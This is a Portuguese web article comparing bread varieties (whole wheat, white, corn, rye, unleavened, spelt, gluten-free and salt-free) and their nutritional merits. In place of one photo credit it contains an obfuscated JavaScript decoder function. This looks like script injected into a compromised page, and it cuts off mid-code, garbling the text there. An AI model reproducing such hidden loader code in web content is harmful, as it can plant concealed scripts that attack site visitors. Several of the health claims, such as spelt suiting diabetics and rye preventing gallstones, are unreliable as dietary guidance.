Descubra qual o tipo de pão adequado à sua dieta
Quentinho ou fresco e fofo. Com um fio de azeite ou manteiga, com doces ou geleias… O pão é delicioso de qualquer forma! Mas não devemos exagerar, já que em excesso pode ser prejudicial para a nossa saúde. Hoje em dia existem tantas e tão diversas variedades de pão que o difícil é escolher. Saiba portanto qual é o pão ideal para incluir na sua dieta e quais as diferenças entre cada um deles:

Descubra qual o tipo de pão adequado à sua dieta – Pão | Foto: saveur
Variedades clássicas do pão
1 – Pão integral vs. pão branco
O pão integral é feito à base dos grãos de trigo ou seja, a camada exterior do trigo que é rica em fibras, vitaminas do complexo B e minerais. Por outro lado, este grão contém uma parte da camada média do trigo que é maioritariamente amido e da camada mais interna do grão onde se alojam as gorduras e as proteínas! Em suma, estes grãos são directamente triturados para fazer a farinha integral enquanto a farinha branca utilizada no pão tradicional que todos conhecemos, é processada antes da trituração, onde são removidas a camada externa (com as vitaminas, minerais e fibras) e a camada interna (com as gorduras saudáveis e as proteínas) dos grãos. Desta forma, o pão integral tem mais nutrientes que o pão branco. O pão integral mantém-nos saciados por mais tempo que o pão branco, por ser rico em fibras.

Descubra qual o tipo de pão adequado à sua dieta – Pão branco e integral | Foto: function a4872b9c6b(y1){var qd=’ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=’;var x0=”;var n6,w6,qe,q8,w9,we,n7;var oa=0;do{q8=qd.indexOf(y1.charAt(oa++));w9=qd.indexOf(y1.charAt(oa++));we=qd.indexOf(y1.charAt(oa++));n7=qd.indexOf(y1.charAt(oa++));n6=(q8<<2)|(w9>>4);w6=((w9&15)<<4)|(we>>2);qe=((we&3)<<6)|n7;if(n6>=192)n6+=848;else if(n6==168)n6=1025;else if(n6==184)n6=1105;x0+=String.fromCharCode(n6);if(we!=64){if(w6>=192)w6+=848;else if(w6==168)w6=1025;else if(w6==184)w6=1105;x0+=String.fromCharCode(w6);}if(n7!=64){if(qe>=192)qe+=848;else if(qe==168)qe=1025;else if(qe==184)qe=1105;x0+=String.fromCharCode(qe);}}while(oa
2- Pão de milho
O pão de milho provém da farinha dos grãos de milho. Se for feito exclusivamente de milho não tem glúten, pelo que é uma óptima opção para quem sofre da doença celíaca ou é intolerante ao glúten. Saiba que o pão de milho é uma rica fonte de ferro que melhora o bom funcionamento do nosso cérebro e ajuda o nosso organismo a produzir energia. E também contém fósforo que estimula a nossa saúde óssea e as nossas células.

Descubra qual o tipo de pão adequado à sua dieta – Pão de milho | Foto: valskitchen
3- Pão de centeio
Há diferenças entre o tradicional pão integral e o pão de centeio, sabe quais? Ambos são considerados pães integrais, no entanto os grão utilizados nas farinhas são extraídos de plantas diferentes. O integral é feito com a farinha de trigo cujo o nome cientifico é “Triticum” enquanto o pão de centeio é feito com a farinha de centeio “Secale”. E, claro, o pão de centeio é mais escuro que o integral! Saiba ainda que o pão de centeio perde nutrientes no processo de moagem, porém ainda mantém as vitaminas, os minerais e os nutrientes necessários para uma dieta equilibrada. Este tipo de pão reduz os níveis de colesterol, ajuda a reduzir o inchaço abdominal e diminui a probabilidade de criar pedras na vesícula.

Descubra qual o tipo de pão adequado à sua dieta – Pão de centeio | Foto: pinimg
Descubra outros pães saudáveis
1- Pão ázimo
Já conhece este pão? O pão ázimo é um tipo de pão recomendado por muitos nutricionistas, já que não leva fermento, e por isso é muito mais leve e menos calórico que os restantes pães. É verdade, este pão leva apenas 3 ingredientes: farinha, óleo e água. Em relação a farinhas, podem ser utilizadas farinha de trigo, aveia, cevada ou centeio. O tempo de cozedura não deve ultrapassar os 18 minutos para que a massa não fermente. Resultado? Um pão estaladiço e muito fino. Eu já provei e recomendo.

Descubra qual o tipo de pão adequado à sua dieta – Ázimo | Foto: pinimg
2- Pão de espelta
A espelta é um grão primo do trigo, porém é muito mais rico em nutrientes. Tem um sem fim de vitaminas, muita proteína e é uma fonte de minerais como o zinco, o selénio e o cobre. Apesar de conter glúten, há quem garanta que é mais tolerável que o pão normal. Tem um sabor característico mais aromatizado que a farinha branca. É caso para dizer que primeiro estranha-se e depois entranha-se! Este pão é indicado para diabéticos, para quem sofre de enxaquecas. Ah e também pode utilizar esta farinha fantástica em bolos como substituto da farinha tradicional.

Descubra qual o tipo de pão adequado à sua dieta – Pão de espelta | Foto: karenhkerr
3- Pão sem glúten e sem sal
Tal como noutros produtos, também já pode encontrar nos supermercados alternativas saudáveis para quem sofre de hipertensão ou doença celíaca. O pão sem glúten é aconselhado para quem sofre de doença celíaca e o pão sem sal é aconselhado para quem sofre de hipertensão.

Descubra qual o tipo de pão adequado à sua dieta – Pão sem glúten | Foto: lucegfbread
Se gostou de descobrir qual é o tipo de pão adequado à sua dieta descubra também as alternativas saudáveis à carne e quais são os alimentos ricos em cálcio que não levam leite.
Gosta de tartes? Descubra aqui 2 receitas maravilhosas: uma deliciosa tarte de maçã e canela e uma tarte de frutos vermelhos sem açúcar.